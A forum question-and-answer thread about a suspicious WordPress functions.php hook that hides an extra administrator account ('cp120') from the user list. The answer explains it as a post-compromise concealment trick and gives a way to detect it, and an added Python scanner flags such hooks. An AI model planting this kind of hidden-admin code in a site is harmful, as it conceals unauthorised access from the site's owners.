dongzhong2674 2013-07-24 21:39

Malicious code in a website steals the administrator password

I have a client that said they think their site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel it's not right?

```php
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username == 'admin') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'", $user_search->query_where);
    }
}
```

1 answer

  • dongqie2028 2013-08-26 16:33

    This code, or similar markup, is sometimes used by WordPress hackers. Once they gain access to your WordPress admin via malicious methods, they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you, in case you are unfamiliar with PHP or don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of; however, the number next to admin users will not match the number of displayed users. It will say (4) but only show 3 names.

    As a note, this code can be used for legitimate reasons, so make sure if you find this that it wasn't done by your site's admin or developer.

    This answer was selected by the asker as the best answer.
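For a site where reading a long functions.php by hand is impractical, the pattern from the question can be flagged statically. This is an added example, not part of the original question or answer; `scan`, `function_body` and the embedded sample are constructed here, and the check is a heuristic that only covers named callbacks registered on `pre_user_query` (closures and obfuscated code are not matched).

```python
import re

# Constructed sample: the snippet from the question as it would sit in functions.php.
SAMPLE_FUNCTIONS_PHP = r"""<?php
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username == 'admin') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'", $user_search->query_where);
    }
}
"""

# add_action/add_filter registrations on pre_user_query with a named callback.
HOOK_RE = re.compile(
    r"add_(?:action|filter)\s*\(\s*['\"]pre_user_query['\"]\s*,\s*['\"](\w+)['\"]")
# A login excluded from the WHERE clause: user_login != 'name' or <> 'name'.
HIDE_RE = re.compile(r"user_login\s*(?:!=|<>)\s*\\?['\"]([^'\"\\]+)")

def function_body(src, name):
    """Body of PHP function `name` by brace counting (heuristic), or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def scan(src, path="functions.php"):
    """List pre_user_query callbacks that rewrite query_where to exclude logins."""
    findings = []
    for hook in HOOK_RE.finditer(src):
        body = function_body(src, hook.group(1))
        if body is None or "query_where" not in body:
            continue  # callback missing or it does not touch the WHERE clause
        hidden = HIDE_RE.findall(body)
        if hidden:
            line = src.count("\n", 0, hook.start()) + 1
            findings.append({"file": path, "line": line,
                             "callback": hook.group(1), "hidden_logins": hidden})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_FUNCTIONS_PHP):
        print(finding)
```

A hit names the login being hidden, which can then be checked against the user list with the site's admin or developer, since the answer notes the same hook has legitimate uses.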